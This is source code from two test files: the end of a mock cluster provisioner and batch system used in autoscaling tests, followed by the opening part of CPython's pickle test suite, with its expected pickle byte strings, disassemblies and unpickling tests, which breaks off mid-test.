self.running = True
self.leaderThread.start()
def shutDown(self):
self.running = False
self.leaderThread.join()
# Stub out all AbstractBatchSystem methods since they are never called
for name, value in iteritems(AbstractBatchSystem.__dict__):
if getattr(value, '__isabstractmethod__', False):
exec('def %s(): pass' % name)
# Without this, the class would end up with .name and .value attributes
del name, value
# AbstractScalableBatchSystem methods
def nodeInUse(self, nodeIP):
return False
def ignoreNode(self, nodeAddress):
pass
def unignoreNode(self, nodeAddress):
pass
@contextmanager
def nodeFiltering(self, filter):
nodes = self.getProvisionedWorkers(preemptable=True,
nodeType=None) + self.getProvisionedWorkers(
preemptable=False, nodeType=None)
yield nodes
# AbstractProvisioner methods
def getProvisionedWorkers(self, nodeType=None, preemptable=None):
"""
Returns a list of Node objects, each representing a worker node in the cluster
:param preemptable: If True only return preemptable nodes else return non-preemptable nodes
:return: list of Node
"""
nodesToWorker = self.nodesToWorker
if nodeType:
return [node for node in nodesToWorker if node.nodeType == nodeType]
else:
return list(nodesToWorker.keys())
def terminateNodes(self, nodes):
self._removeNodes(nodes)
def remainingBillingInterval(self, node):
pass
def addJob(self, jobShape, preemptable=False):
"""
Add a job to the job queue
"""
self.totalJobs += 1
jobID = uuid.uuid4()
self.jobBatchSystemIDToIssuedJob[jobID] = Job(memory=jobShape.memory,
cores=jobShape.cores, disk=jobShape.disk,
preemptable=preemptable)
self.jobQueue.put(jobID)
# JobBatcher functionality
def getNumberOfJobsIssued(self, preemptable=None):
if preemptable is not None:
jobList = [job for job in list(self.jobQueue.queue) if
self.jobBatchSystemIDToIssuedJob[job].preemptable == preemptable]
return len(jobList)
else:
return self.jobQueue.qsize()
def getJobs(self):
return self.jobBatchSystemIDToIssuedJob.values()
# AbstractScalableBatchSystem functionality
def getNodes(self, preemptable=False, timeout=None):
nodes = dict()
for node in self.nodesToWorker:
if node.preemptable == preemptable:
worker = self.nodesToWorker[node]
nodes[node.privateIP] = NodeInfo(coresTotal=0, coresUsed=0, requestedCores=1,
memoryTotal=0, memoryUsed=0, requestedMemory=1,
workers=1 if worker.busyEvent.is_set() else 0)
return nodes
# AbstractProvisioner functionality
def addNodes(self, nodeType, numNodes, preemptable):
self._addNodes(numNodes=numNodes, nodeType=nodeType, preemptable=preemptable)
return self.getNumberOfNodes(nodeType=nodeType, preemptable=preemptable)
def getNodeShape(self, nodeType, preemptable=False):
# Assume node shapes and node types are the same thing for testing
return nodeType
def getWorkersInCluster(self, nodeShape):
return self.workers[nodeShape]
def launchCluster(self, leaderNodeType, keyName, userTags=None,
vpcSubnet=None, leaderStorage=50, nodeStorage=50, botoPath=None, **kwargs):
pass
def destroyCluster(self):
pass
def getLeader(self):
pass
def _leaderFn(self):
while self.running:
updatedJobID = None
try:
updatedJobID = self.updatedJobsQueue.get(timeout=1.0)
except Empty:
continue
if updatedJobID:
del self.jobBatchSystemIDToIssuedJob[updatedJobID]
time.sleep(0.1)
def _addNodes(self, numNodes, nodeType, preemptable=False):
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
class Worker(object):
def __init__(self, jobQueue, updatedJobsQueue, secondsPerJob):
self.busyEvent = Event()
self.stopEvent = Event()
def workerFn():
while True:
if self.stopEvent.is_set():
return
try:
jobID = jobQueue.get(timeout=1.0)
except Empty:
continue
updatedJobsQueue.put(jobID)
self.busyEvent.set()
time.sleep(secondsPerJob)
self.busyEvent.clear()
self.startTime = time.time()
self.worker = Thread(target=workerFn)
self.worker.start()
def stop(self):
self.stopEvent.set()
self.worker.join()
return time.time() - self.startTime
for _ in range(numNodes):
node = Node('127.0.0.1', uuid.uuid4(), 'testNode', datetime.datetime.now().isoformat()+'Z', nodeType=nodeType,
preemptable=preemptable)
self.nodesToWorker[node] = Worker(self.jobQueue, self.updatedJobsQueue, self.secondsPerJob)
self.workers[nodeShape].append(self.nodesToWorker[node])
self.maxWorkers[nodeShape] = max(self.maxWorkers[nodeShape], len(self.workers[nodeShape]))
def _removeNodes(self, nodes):
logger.debug("Removing nodes. %s workers and %s to terminate.", len(self.nodesToWorker),
len(nodes))
for node in nodes:
logger.debug("removed node")
try:
nodeShape = self.getNodeShape(node.nodeType, node.preemptable)
worker = self.nodesToWorker.pop(node)
self.workers[nodeShape].pop()
self.totalWorkerTime += worker.stop()
except KeyError:
# Node isn't our responsibility
pass
def getNumberOfNodes(self, nodeType=None, preemptable=None):
if nodeType:
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
return len(self.workers[nodeShape])
else:
return len(self.nodesToWorker)
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
from test import support
from test.support import (
TestFailed, TESTFN, run_with_locale, no_tracing,
_2G, _4G, bigmemtest, forget,
)
from test.support import threading_helper
from test.support.warnings_helper import save_restore_warnings_filters
from pickle import bytes_types
# bpo-41003: Save/restore warnings filters to leave them unchanged.
# Ignore filters installed by numpy.
try:
with save_restore_warnings_filters():
import numpy as np
except ImportError:
np = None
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
class MinimalIO(object):
"""
A file-like object that doesn't support readinto().
"""
def __init__(self, *args):
self._bio = io.BytesIO(*args)
self.getvalue = self._bio.getvalue
self.read = self._bio.read
self.readline = self._bio.readline
self.write = self._bio.write
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
class H(object):
pass
# Hashable mutable key
class K(object):
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
__main__.H = H
H.__module__ = "__main__"
__main__.K = K
K.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests(unittest.TestCase):
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of old style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Try too with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
